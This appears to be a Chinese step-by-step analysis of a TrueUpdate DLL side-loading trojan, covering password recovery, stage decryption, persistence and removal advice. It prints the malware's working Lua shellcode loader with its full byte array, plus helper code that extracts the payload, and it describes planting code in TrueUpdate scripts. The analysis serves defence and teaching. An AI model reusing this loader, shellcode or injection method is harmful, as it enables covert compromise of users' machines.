TrueUpdate白加黑木马分析保姆级教程

目录

• TrueUpdate白加黑木马分析保姆级教程
  • 0x00：前言
    • TrueUpdate是什么？
  • 0x01: TrueUpdate逆向分析解压密码
    • 查壳
    • 脱壳
    • 分金定穴
    • 找到解压密码方法1：
    • 找到解压密码方法2：
    • 提取密码附近关键字特征
  • 0x02：揭开.dat真相
  • 0x03: 插入恶意代码(玩点好玩的)
  • 0x04：进入正题(piao-230904.exe行为分析)
    • 释放文件行为
    • 执行程序行为
    • 网络请求行为
  • 0x05：进入正题(看穿他的小把戏)
    • 解开BdXvPwNs.dat
    • 让我看看你的真面目
  • 0x06: 进入正题(哦吼?有点东西)
    • Shellcode还原
    • ShellCode代码静态分析
    • 还原edge.xml
    • edge.dll代码静态分析
  • 0x07: 进入正题(花头劲真多)
    • 解密edge.jpg
  • 0x08: 进入正题(揪出你的藏身之处)
  • 0x09: 总结

TrueUpdate白加黑木马分析保姆级教程

0x00：前言

首先说下什么是TrueUpdate白加黑木马，这里以piao-230904.exe为例。(在当前样本目下)

当这个piao-230904.exe执行后会释放出多个文件到C:\Users\Public\Download\xxx的目录下，而其中释放出来的exe右键其属性可以看到其文件信息是TrueUpdate。

TrueUpdate是什么？

TrueUpdate是一家国外公司IndigoRose开发的，可以对用户自定义配置信息或者是自定义lua脚本进行程序自动更新的一款产品。TrueUpdate安装包下载地址

当我们点击Build按钮后，就会生成一个自动更新的EXE程序还有一个同名的.dat文件。

.dat文件另有乾坤，他其实是一个有密码的zip压缩包文件，我们将.dat后缀改为.zip后可以直接用bandzip等软件进行打开。

0x01: TrueUpdate逆向分析解压密码

好家伙他居然需要解压密码，那我们就强行逆他。直接对我生成的这个TrueUpdateClient.exe进行逆向分析。

查壳

加了简简单单的压缩壳。查壳工具在这里下载

脱壳

直接无脑用工具脱就行了。upx脱壳工具在这里下载

脱壳完成！

分金定穴

如何快速定位到关键的位置，我的思路比较傻哈哈哈哈哈哈哈哈哈哈哈哈（但是往往都非常的实用），我是在IDA里面搜索关键字zip。

之后就发现了很有用的线索，找到了一个DynaZIP C++压缩库的一些特征。

dunzip.dll下载地址，我们将dll下载过来后查看下他的导出函数，查看有哪些可疑的导出函数是可以直接调用拿来作为解压的。

接着我们记住dunzip导出函数的特征，因为待会分析TrueUpdate程序时候，需要对比下。

接着我们IDA里面往下拉，找到可用的字符串作为特征（方便待会去TrueUpdate里面搜索这个特征）。

现在，让我们用IDA打开TrueUpdate进行分析，然后shift+12（字符串界面）进行搜索字符串特征Extract Progress。（这个目的就是为了在TrueUpdate里面找到dunzip这个函数）

你可能会问：这个dunzip函数在TrueUpdate里面不是可以作为导入函数直接用名字搜到吗？（当DynaZip库被作为.lib库而不是作为.dll库使用时候dunzip函数的所有代码会被编译到TrueUpdate里面，这时候dunzip这个函数就会变成以sub_xxx开头的匿名函数，所以才会这么麻烦需要用到这种字符串特征来找~）。

这时候有3处函数引用到了这个Extract Progress字符串，我们需要做的就是挨个点击进去，然后和我上上上上上面那张写有记住dunzip的特征图片进行代码的对比。

接着我们来看下dunzip在哪些地方被调用了，也是挨个点击进去看代码，看看有没有什么可疑的地方。（搞逆向就是不能偷懒，一步步来 每个函数都不能放过！）

接着我用两种方法找到了解压密码，本质上一样的。（我用的是方法1）

找到解压密码方法1：

找到了ZIPEntryInfo，代表接下来的代码应该就是马上要进行解压了，那必定会在堆栈里面出现密码等参数。

在关键字那一处代码位置，按一下快捷键tab切换到汇编视图。（你可以在Options设置里面选中Line prefixes）这样以后的汇编视图就都会显示对应的地址。

在x64dbg中打开TrueUpdate程序，进行动态调试分析。x64dbg下载官网

接来下进行密码验证。

找到解压密码方法2：

提取密码附近关键字特征

提取关键字特征的意义在于我们下次再遇到可能不同解压密码，但是相同都是用TrueUpdate打包出来的exe时候可以快速的找到他的解压密码（而不是去通过逆向分析）。

（这个解压密码我猜测是TrueUpdate在打包时候，根据当前计算机电脑的机器码等信息生成并写入到exe里面的。）

提取关键字：Failed to find project file (2) in archive

0x02：揭开.dat真相

当我们将.dat改为.zip并用密码进行解压后得到如下四个文件，其中比较重要的就是_TUProj.dat他是一个lua脚本，TrueUpdate执行是会加载这个lua脚本执行。

我们在配置TrueUpdate时候，可以随意修改这个Client Script里面的lua脚本，最后打包成exe的时候lua脚本都会被执行的。（恶意作者开发者往往就喜欢在这种地方插入个恶意代码shellcode之类啥的）

0x03: 插入恶意代码(玩点好玩的)

Build打包生成exe。

恶意代码成功被触发！！！！！！！！！

0x04：进入正题(piao-230904.exe行为分析)

用管理员权限打开火绒剑，然后直接将piao-230904.exe拖入到火绒剑进行行为分析。

释放文件行为

执行程序行为

网络请求行为

0x05：进入正题(看穿他的小把戏)

我们对释放出来的BdXvPwNs.exe进行分析，右键属性详细信息就能发现他的猫腻。

解开BdXvPwNs.dat

我们在0x01和0x02都分析过TrueUpdate的.dat文件其实就是一个带lua的加密压缩包，并且我们也知道如何提取解压密码了，是吧？

来吧，进行实战！

请提取出解压密码并且解压BdXvPwNs.dat文件。

得到解压密码

BdXvPwNs.dat解压密码:
99B2328D3FDF4E9E98559B4414F7ACB9

让我看看你的真面目

我们打开_TUProj.dat的lua脚本，可以看到木马作者确实也加了恶意代码进去哈哈哈哈。

下面我把这一段lua代码进行了注释，方便读者更加容易阅读和理解。

g_table_char = {233,11,3,0,0,204,204,204,204,204,204,204,204,204,204,204,100,161,48,0,0,0,133,192,120,13,139,64,12,139,64,20,139,0,139,0,139,64,16,195,204,204,204,204,204,204,204,204,85,139,236,131,236,24,100,161,48,0,0,0,83,86,87,139,64,12,137,77,240,139,112,12,139,86,24,137,85,252,133,210,15,132,162,0,0,0,139,66,60,51,255,139,78,44,139,94,48,139,54,139,68,16,120,137,69,244,137,117,248,133,192,116,121,139,195,15,172,193,16,15,183,241,51,201,133,246,116,26,15,190,20,11,193,207,13,128,60,11,97,124,3,131,199,224,65,3,250,59,206,114,233,139,85,252,139,69,244,51,219,3,194,137,69,244,139,72,32,3,202,57,88,24,118,57,102,144,139,49,51,192,3,242,131,193,4,137,77,236,15,31,64,0,138,22,141,118,1,193,200,13,15,190,202,3,193,132,210,117,239,139,85,252,3,199,59,69,240,116,38,139,69,244,67,139,77,236,59,88,24,114,201,139,117,248,139,86,24,137,85,252,133,210,15,133,94,255,255,255,51,192,95,94,91,139,229,93,195,139,117,244,95,139,70,36,141,4,88,15,183,12,16,139,70,28,94,91,141,4,136,139,4,16,3,194,139,229,93,195,85,139,236,131,236,100,83,86,87,139,249,137,125,244,232,221,254,255,255,139,208,51,246,139,66,60,57,116,16,124,117,7,51,246,233,156,0,0,0,139,68,16,120,133,192,116,241,139,92,16,24,133,219,116,233,139,76,16,36,139,124,16,32,3,202,139,68,16,28,3,250,3,194,137,77,252,51,201,137,69,248,75,139,4,143,3,194,128,56,71,117,78,128,120,1,101,117,72,128,120,2,116,117,66,128,120,3,80,117,60,128,120,4,114,117,54,128,120,5,111,117,48,128,120,6,99,117,42,128,120,7,65,117,36,128,120,8,100,117,30,128,120,9,100,117,24,128,120,10,114,117,18,128,120,11,101,117,12,128,120,12,115,117,6,128,120,13,115,116,7,65,59,203,118,163,235,15,139,69,252,139,117,248,15,183,4,72,139,52,134,3,242,139,125,244,141,69,156,137,55,80,199,69,156,76,111,97,100,199,69,160,76,105,98,114,199,69,164,97,114,121,65,198,69,168,0,232,9,254,255,255,80,139,7,255,208,141,77,196,137,71,4,81,141,77,208,199,69,208,85,115,101,114,81,199,69,212,51,50,46,100,102,199,69,216,108,108,198,69,218,0,199,69,196,77,101,115,115,199,69,200,97,103,101,66,199,69,204,111,120,65,0,255,208,80,139,7,255,208,137,71,8,141,69,184,80,199,69,184,67,114,101,97,199,69,188,116,101,70,105,199,69,192,108,101,65,0,232,164,253,255,255,80,139,7,255,208,137,71,12,141,69,172,80,199,69,172,71,101,116,70,199,69,176,105,108,101,83,199,69,180,105,122,101,0,232,126,253,255,255,80,139,7,255,208,137,71,16,141,69,232,80,199,69,232,82,101,97,100,199,69,236,70,105,108,101,198,69,240,0,232,91,253,255,255,80,139,7,255,208,185,76,119,38,7,137,71,20,232,105,253,255,255,141,77,220,137,71,36,81,199,69,220,110,116,100,108,199,69,224,108,46,100,108,102,199,69,228,108,0,255,208,185,80,125,163,126,232,66,253,255,255,185,210,138,43,141,137,71,28,232,53,253,255,255,137,71,32,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,85,139,236,131,228,248,131,236,40,141,12,36,232,255,253,255,255,141,12,36,232,7,0,0,0,139,229,93,195,204,204,204,85,139,236,131,236,116,83,86,87,106,0,106,0,106,3,106,0,106,1,139,249,199,69,172,101,100,103,101,104,0,0,0,128,141,69,172,199,69,176,46,120,109,108,80,139,71,12,102,199,69,180,0,0,255,208,139,79,16,139,240,106,0,86,255,209,139,79,28,80,137,69,244,199,69,220,0,0,0,0,255,209,139,79,20,131,196,4,139,216,141,69,220,137,93,216,106,0,80,255,117,244,83,86,255,209,15,182,67,1,52,48,138,11,4,48,128,241,48,136,67,1,128,193,48,15,182,67,2,52,48,136,11,4,48,136,67,2,15,182,67,3,52,48,4,48,136,67,3,15,182,67,4,52,48,4,48,106,32,136,67,4,141,69,140,106,0,80,139,71,32,255,208,139,125,244,185,181,65,217,94,137,93,140,137,125,144,232,65,252,255,255,185,45,177,136,148,137,69,232,137,69,148,232,49,252,255,255,185,19,156,191,189,137,69,212,137,69,152,232,33,252,255,255,185,104,253,133,128,137,69,204,137,69,156,232,17,252,255,255,185,179,114,233,90,137,69,236,137,69,160,232,1,252,255,255,185,229,92,239,63,137,69,208,137,69,164,232,241,251,255,255,51,246,137,69,200,137,69,168,137,117,252,131,255,64,15,134,55,3,0,0,184,77,90,0,0,102,57,3,15,133,41,3,0,0,139,75,60,137,77,240,141,129,248,0,0,0,59,248,15,130,21,3,0,0,3,203,137,77,248,129,57,80,69,0,0,15,133,4,3,0,0,102,139,65,22,186,2,32,0,0,102,35,194,102,59,194,15,133,239,2,0,0,184,224,0,0,0,102,57,65,20,15,133,224,2,0,0,15,183,121,6,51,210,137,125,224,133,255,116,110,129,193,8,1,0,0,15,31,0,139,65,4,3,1,59,69,244,15,135,188,2,0,0,66,131,193,40,59,215,124,234,139,69,248,51,210,139,117,224,139,72,56,141,152,8,1,0,0,139,64,84,72,137,77,228,3,193,247,241,139,248,15,175,249,139,83,248,57,19,139,77,228,15,79,19,141,91,40,3,83,212,141,65,255,3,194,51,210,247,241,15,175,193,59,248,15,77,199,139,248,131,238,1,117,215,139,93,216,235,22,139,69,240,51,210,139,73,56,139,68,24,84,72,3,193,247,241,139,248,15,175,249,133,255,15,132,71,2,0,0,106,64,104,0,16,0,0,141,69,216,137,125,216,80,106,0,141,69,252,80,106,255,255,85,212,139,117,252,133,246,15,132,35,2,0,0,139,125,240,15,183,84,31,6,139,194,141,12,128,139,68,31,84,141,60,200,51,201,133,255,126,23,138,4,25,136,4,49,65,139,117,252,59,207,124,242,139,77,248,15,183,81,6,235,3,139,77,248,51,192,51,255,137,69,244,102,59,250,115,74,141,145,8,1,0,0,15,31,0,139,74,252,133,201,116,36,131,58,0,116,31,141,60,49,51,201,57,10,118,22,139,66,4,3,193,138,4,24,136,4,57,65,59,10,114,240,139,117,252,139,69,244,139,77,248,64,137,69,244,131,194,40,15,183,65,6,57,69,244,139,69,244,124,191,139,145,160,0,0,0,133,210,116,119,131,185,164,0,0,0,0,118,110,139,198,141,60,50,43,65,52,139,79,4,137,69,228,139,7,3,193,116,87,199,69,212,0,48,0,0,199,69,224,0,160,0,0,141,89,248,186,0,0,0,0,209,235,116,49,15,183,68,87,8,139,200,129,225,0,240,0,0,102,59,77,212,116,6,102,59,77,224,117,16,139,77,228,37,255,15,0,0,3,7,1,12,48,139,117,252,66,59,211,124,210,139,79,4,139,4,15,3,249,139,79,4,3,193,117,183,139,77,248,139,129,128,0,0,0,133,192,15,132,10,1,0,0,139,20,48,141,12,48,137,77,224,133,210,15,132,225,0,0,0,139,93,236,139,65,16,3,198,199,69,244,0,0,0,0,137,69,212,141,4,50,137,69,228,139,65,12,3,198,80,141,69,192,80,255,211,106,1,141,69,192,80,141,69,184,80,255,85,208,141,69,244,80,141,69,184,80,106,0,106,0,255,85,204,141,69,184,80,255,85,200,139,77,244,133,201,15,132,164,0,0,0,139,117,228,51,255,139,6,133,192,116,110,51,219,199,69,240,0,0,0,0,133,192,121,24,15,183,192,133,192,15,132,129,0,0,0,141,85,240,82,80,106,0,81,255,85,232,235,37,139,117,252,131,192,2,3,198,116,109,80,141,69,192,80,255,85,236,141,69,240,80,106,0,141,69,192,80,255,117,244,255,85,232,139,117,228,139,69,240,133,192,116,72,139,77,212,71,137,4,11,141,28,189,0,0,0,0,139,4,51,133,192,116,5,139,77,244,235,151,139,93,236,139,77,224,139,117,252,131,193,20,137,77,224,139,17,133,210,15,133,34,255,255,255,139,69,248,137,112,52,139,77,252,139,64,40,81,106,1,106,0,3,193,255,208,139,117,252,95,139,198,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204};
VirtualAlloc = "VirtualAlloc";
VirtualProtect = "VirtualProtect";
dllname = "c:\\windows\\system32\\user32.dll";
kernel32 = "c:\\windows\\system32\\kernel32.dll";
rpcrt4 = "c:\\windows\\system32\\rpcrt4.dll";

--这里获取table_char的长度，我猜测table_char可能是个shellcode?
g_Len = Table.Count(g_table_char);
--根据table_char来申请内存空间                 参数1：开始地址，参数2：大小，参数3：类型，参数4：保护属性
g_Addr = DLL.CallFunction(kernel32, VirtualAlloc, "0,"..g_Len..",12288,4", DLL_RETURN_TYPE_LONG, DLL_CALL_STDCALL)
RtlFillMemory = "RtlFillMemory";
g_Sum = g_Len - 1;
co = 0;

--for 循环table_char长度的次数
for i=0,g_Sum do
	--RtlFillMemory 是用指定的值来填充数据     参数1：目标地址的指针，参数2：目标大小，参数3：指定的值  (这一段意思应该就是把g_table_char拷贝到虚拟内存空间)
	DLL.CallFunction(kernel32, RtlFillMemory, ""..g_Addr+i..",1,"..g_table_char[i+1].."", DLL_RETURN_TYPE_LONG, DLL_CALL_STDCALL)
	co = co +1;
	--如果填充完50次，就休息0秒钟
	if co == 50 then
		co=0;
		Application.Sleep(0);
	end
end
Application.Sleep(0);

CreateThread = "CreateThread";--创建线程      参数1：结构指针(默认NULL) 参数2：初始堆栈大小(默认NULL) 参数3：线程函数指针，参数4：线程函数的参数
DLL.CallFunction(kernel32, CreateThread, "0,0,"..g_Addr..",0,0,0", DLL_RETURN_TYPE_LONG, DLL_CALL_STDCALL);
Sleep = "Sleep";
DLL.CallFunction(kernel32, Sleep, 4294967295);--调用Sleep 4294967295毫秒

0x06: 进入正题(哦吼?有点东西)

Shellcode还原

咱们把他上面的十进制ShellCode转换成十六进制ShellCode，方便IDA进行静态逆向分析。

转换代码C++ ./src/ShellCodeChang.cpp

#include <stdio.h>
int main()
{
	unsigned char g_table_char[1952] = {233,11,3,0,0,204,204,204,204,204,204,204,204,204,204,204,100,161,48,0,0,0,133,192,120,13,139,64,12,139,64,20,139,0,139,0,139,64,16,195,204,204,204,204,204,204,204,204,85,139,236,131,236,24,100,161,48,0,0,0,83,86,87,139,64,12,137,77,240,139,112,12,139,86,24,137,85,252,133,210,15,132,162,0,0,0,139,66,60,51,255,139,78,44,139,94,48,139,54,139,68,16,120,137,69,244,137,117,248,133,192,116,121,139,195,15,172,193,16,15,183,241,51,201,133,246,116,26,15,190,20,11,193,207,13,128,60,11,97,124,3,131,199,224,65,3,250,59,206,114,233,139,85,252,139,69,244,51,219,3,194,137,69,244,139,72,32,3,202,57,88,24,118,57,102,144,139,49,51,192,3,242,131,193,4,137,77,236,15,31,64,0,138,22,141,118,1,193,200,13,15,190,202,3,193,132,210,117,239,139,85,252,3,199,59,69,240,116,38,139,69,244,67,139,77,236,59,88,24,114,201,139,117,248,139,86,24,137,85,252,133,210,15,133,94,255,255,255,51,192,95,94,91,139,229,93,195,139,117,244,95,139,70,36,141,4,88,15,183,12,16,139,70,28,94,91,141,4,136,139,4,16,3,194,139,229,93,195,85,139,236,131,236,100,83,86,87,139,249,137,125,244,232,221,254,255,255,139,208,51,246,139,66,60,57,116,16,124,117,7,51,246,233,156,0,0,0,139,68,16,120,133,192,116,241,139,92,16,24,133,219,116,233,139,76,16,36,139,124,16,32,3,202,139,68,16,28,3,250,3,194,137,77,252,51,201,137,69,248,75,139,4,143,3,194,128,56,71,117,78,128,120,1,101,117,72,128,120,2,116,117,66,128,120,3,80,117,60,128,120,4,114,117,54,128,120,5,111,117,48,128,120,6,99,117,42,128,120,7,65,117,36,128,120,8,100,117,30,128,120,9,100,117,24,128,120,10,114,117,18,128,120,11,101,117,12,128,120,12,115,117,6,128,120,13,115,116,7,65,59,203,118,163,235,15,139,69,252,139,117,248,15,183,4,72,139,52,134,3,242,139,125,244,141,69,156,137,55,80,199,69,156,76,111,97,100,199,69,160,76,105,98,114,199,69,164,97,114,121,65,198,69,168,0,232,9,254,255,255,80,139,7,255,208,141,77,196,137,71,4,81,141,77,208,199,69,208,85,115,101,114,81,199,69,212,51,50,46,100,102,199,69,216,108,108,198,69,218,0,199,69,196,77,101,115,115,199,69,200,97,103,101,66,199,69,204,111,120,65,0,255,208,80,139,7,255,208,137,71,8,141,69,184,80,199,69,184,67,114,101,97,199,69,188,116,101,70,105,199,69,192,108,101,65,0,232,164,253,255,255,80,139,7,255,208,137,71,12,141,69,172,80,199,69,172,71,101,116,70,199,69,176,105,108,101,83,199,69,180,105,122,101,0,232,126,253,255,255,80,139,7,255,208,137,71,16,141,69,232,80,199,69,232,82,101,97,100,199,69,236,70,105,108,101,198,69,240,0,232,91,253,255,255,80,139,7,255,208,185,76,119,38,7,137,71,20,232,105,253,255,255,141,77,220,137,71,36,81,199,69,220,110,116,100,108,199,69,224,108,46,100,108,102,199,69,228,108,0,255,208,185,80,125,163,126,232,66,253,255,255,185,210,138,43,141,137,71,28,232,53,253,255,255,137,71,32,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,85,139,236,131,228,248,131,236,40,141,12,36,232,255,253,255,255,141,12,36,232,7,0,0,0,139,229,93,195,204,204,204,85,139,236,131,236,116,83,86,87,106,0,106,0,106,3,106,0,106,1,139,249,199,69,172,101,100,103,101,104,0,0,0,128,141,69,172,199,69,176,46,120,109,108,80,139,71,12,102,199,69,180,0,0,255,208,139,79,16,139,240,106,0,86,255,209,139,79,28,80,137,69,244,199,69,220,0,0,0,0,255,209,139,79,20,131,196,4,139,216,141,69,220,137,93,216,106,0,80,255,117,244,83,86,255,209,15,182,67,1,52,48,138,11,4,48,128,241,48,136,67,1,128,193,48,15,182,67,2,52,48,136,11,4,48,136,67,2,15,182,67,3,52,48,4,48,136,67,3,15,182,67,4,52,48,4,48,106,32,136,67,4,141,69,140,106,0,80,139,71,32,255,208,139,125,244,185,181,65,217,94,137,93,140,137,125,144,232,65,252,255,255,185,45,177,136,148,137,69,232,137,69,148,232,49,252,255,255,185,19,156,191,189,137,69,212,137,69,152,232,33,252,255,255,185,104,253,133,128,137,69,204,137,69,156,232,17,252,255,255,185,179,114,233,90,137,69,236,137,69,160,232,1,252,255,255,185,229,92,239,63,137,69,208,137,69,164,232,241,251,255,255,51,246,137,69,200,137,69,168,137,117,252,131,255,64,15,134,55,3,0,0,184,77,90,0,0,102,57,3,15,133,41,3,0,0,139,75,60,137,77,240,141,129,248,0,0,0,59,248,15,130,21,3,0,0,3,203,137,77,248,129,57,80,69,0,0,15,133,4,3,0,0,102,139,65,22,186,2,32,0,0,102,35,194,102,59,194,15,133,239,2,0,0,184,224,0,0,0,102,57,65,20,15,133,224,2,0,0,15,183,121,6,51,210,137,125,224,133,255,116,110,129,193,8,1,0,0,15,31,0,139,65,4,3,1,59,69,244,15,135,188,2,0,0,66,131,193,40,59,215,124,234,139,69,248,51,210,139,117,224,139,72,56,141,152,8,1,0,0,139,64,84,72,137,77,228,3,193,247,241,139,248,15,175,249,139,83,248,57,19,139,77,228,15,79,19,141,91,40,3,83,212,141,65,255,3,194,51,210,247,241,15,175,193,59,248,15,77,199,139,248,131,238,1,117,215,139,93,216,235,22,139,69,240,51,210,139,73,56,139,68,24,84,72,3,193,247,241,139,248,15,175,249,133,255,15,132,71,2,0,0,106,64,104,0,16,0,0,141,69,216,137,125,216,80,106,0,141,69,252,80,106,255,255,85,212,139,117,252,133,246,15,132,35,2,0,0,139,125,240,15,183,84,31,6,139,194,141,12,128,139,68,31,84,141,60,200,51,201,133,255,126,23,138,4,25,136,4,49,65,139,117,252,59,207,124,242,139,77,248,15,183,81,6,235,3,139,77,248,51,192,51,255,137,69,244,102,59,250,115,74,141,145,8,1,0,0,15,31,0,139,74,252,133,201,116,36,131,58,0,116,31,141,60,49,51,201,57,10,118,22,139,66,4,3,193,138,4,24,136,4,57,65,59,10,114,240,139,117,252,139,69,244,139,77,248,64,137,69,244,131,194,40,15,183,65,6,57,69,244,139,69,244,124,191,139,145,160,0,0,0,133,210,116,119,131,185,164,0,0,0,0,118,110,139,198,141,60,50,43,65,52,139,79,4,137,69,228,139,7,3,193,116,87,199,69,212,0,48,0,0,199,69,224,0,160,0,0,141,89,248,186,0,0,0,0,209,235,116,49,15,183,68,87,8,139,200,129,225,0,240,0,0,102,59,77,212,116,6,102,59,77,224,117,16,139,77,228,37,255,15,0,0,3,7,1,12,48,139,117,252,66,59,211,124,210,139,79,4,139,4,15,3,249,139,79,4,3,193,117,183,139,77,248,139,129,128,0,0,0,133,192,15,132,10,1,0,0,139,20,48,141,12,48,137,77,224,133,210,15,132,225,0,0,0,139,93,236,139,65,16,3,198,199,69,244,0,0,0,0,137,69,212,141,4,50,137,69,228,139,65,12,3,198,80,141,69,192,80,255,211,106,1,141,69,192,80,141,69,184,80,255,85,208,141,69,244,80,141,69,184,80,106,0,106,0,255,85,204,141,69,184,80,255,85,200,139,77,244,133,201,15,132,164,0,0,0,139,117,228,51,255,139,6,133,192,116,110,51,219,199,69,240,0,0,0,0,133,192,121,24,15,183,192,133,192,15,132,129,0,0,0,141,85,240,82,80,106,0,81,255,85,232,235,37,139,117,252,131,192,2,3,198,116,109,80,141,69,192,80,255,85,236,141,69,240,80,106,0,141,69,192,80,255,117,244,255,85,232,139,117,228,139,69,240,133,192,116,72,139,77,212,71,137,4,11,141,28,189,0,0,0,0,139,4,51,133,192,116,5,139,77,244,235,151,139,93,236,139,77,224,139,117,252,131,193,20,137,77,224,139,17,133,210,15,133,34,255,255,255,139,69,248,137,112,52,139,77,252,139,64,40,81,106,1,106,0,3,193,255,208,139,117,252,95,139,198,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204};

    printf("恶意代码的ShellCode如下:\n");
    printf("---------------------------------------------------\n");
    for(int i=0;i<sizeof(g_table_char);i++)
    {
        printf("0x%0X,",g_table_char[i]);
    }
    printf("\n");
    printf("---------------------------------------------------\n");

    FILE *fp = fopen("C:\\Users\\Anonymous\\Desktop\\Shellcode.bin","wb");
    fwrite(g_table_char,1,sizeof(g_table_char),fp);
    fclose(fp);
    printf("恶意Shellcode写出到C:\\Users\\Anonymous\\Desktop\\Shellcode.bin \n");
    return 0;
}

IDA Pro7.7全插件版本下载

ShellCode代码静态分析

接下来，我们就是慢慢的开始进行代码分析（逐句分析，写好注释，做好函数重命名 养成一个好习惯!）。

以下是我个人的代码分析，以及一些注释！.\idb\shellcode.bin.idb

首先第一个函数是把一些将会用到的API函数，利用函数指针的方式存到一个v1数组里面，后续将利用函数指针方式来直接动态调用！

第一步：我们先了解下这个this+x 就是代表v1数组里面的元素，偏移是4

接着我们开始来详细的分析下面的代码。

• 读取edge.xml内容
• 解密edge.xml前5字节
• 获取内核函数
• 进行内存加载并且执行

还原edge.xml

利用python的hex 和异或运算，将edge.xml的前五字节进行还原！Python下载地址

利用010Editor 直接修改前5个字节内容，并且将文件后缀名改为.dll。010Editor下载地址

edge.dll代码静态分析

权限维持！

解密Edge.jpg并且内存加载！

edge.jpg解密算法研究

x64dbg拖入edge.dll进行动态分析。

跳转到主程序领空

右键搜索->当前模块->字符串。

跳转到字符串引用代码

运行到断点处！

进入解密函数

分析eax的值

接着在010Editor中以十六进制格式进行搜索，就能搜索到这个恶意添加到edge.jpg中的数据了。

分析异或密钥

判断满足条件加密数据大小。

解密完之后，就要进行内存加载运行了!

0x07: 进入正题(花头劲真多)

解密edge.jpg

用010Editor打开Edge.jpg然后以十六进制格式搜索如下内容。

08 1C D7 48 4A 4A 4B 4C 49 4E 4F 50 AE AD 53 54

然后复制大小为0x59000大小的内容，然后将内存保存成hack.jpg。

解密代码:./src/XorDecrypt.cpp。

解密代码的核心算法是循环异或0x45(一直自增)。

#include <stdio.h>
#include <Windows.h>

int main(int argc, char* argv[])
{

	//读取加密文件
	FILE *fp = fopen(argv[1],"rb");
	fseek(fp,SEEK_SET,SEEK_END);
	int BufSize = ftell(fp);
	fseek(fp,SEEK_SET,SEEK_SET);
	unsigned char *Buffer = (unsigned char*)malloc(BufSize);
	fread(Buffer,BufSize,1,fp);
	fclose(fp);

	//解密
	int k=0;
	for (int i=0;i<BufSize;i++)
	{
		Buffer[i] ^= (0x45+k++);//异或的密钥
	}

	//写出解密文件
	char dest[MAX_PATH]={0};
	wsprintfA(dest,"%s.dll",argv[1]);
	FILE *fpout = fopen(dest,"wb");
	fwrite(Buffer,BufSize,1,fpout);
	fclose(fpout);
	free(Buffer);
	Buffer=NULL;

	printf("文件解密成功%s!\n",dest);
	return 0;
}

0x08: 进入正题(揪出你的藏身之处)

将hack.jpg.dll拖入IDA进行静态分析。

在入口处可以看到可疑的木马常用api函数connect网络连接函数。

0x09: 总结

我们来回顾下这个木马的所有行为还有流程。

建议如果已经中马的人可以在开机启动项注册表中删除相关的键值。

查看是否有服务名称为：Canyue的服务

查看计划任务是否有Micros0ftEdgeUpdateTask0UA

请不要随意打开(陌生人)(朋友)发送的压缩包、EXE文件，最后这些都是在虚拟机里打开，并且用行为分析软件进行分析。

请不要太相信杀毒软件的扫描结果，很多恶意软件是会进行免杀的，比如这次分析的这个用多文件白加黑是很容易进行免杀的。

谢谢大家的观看。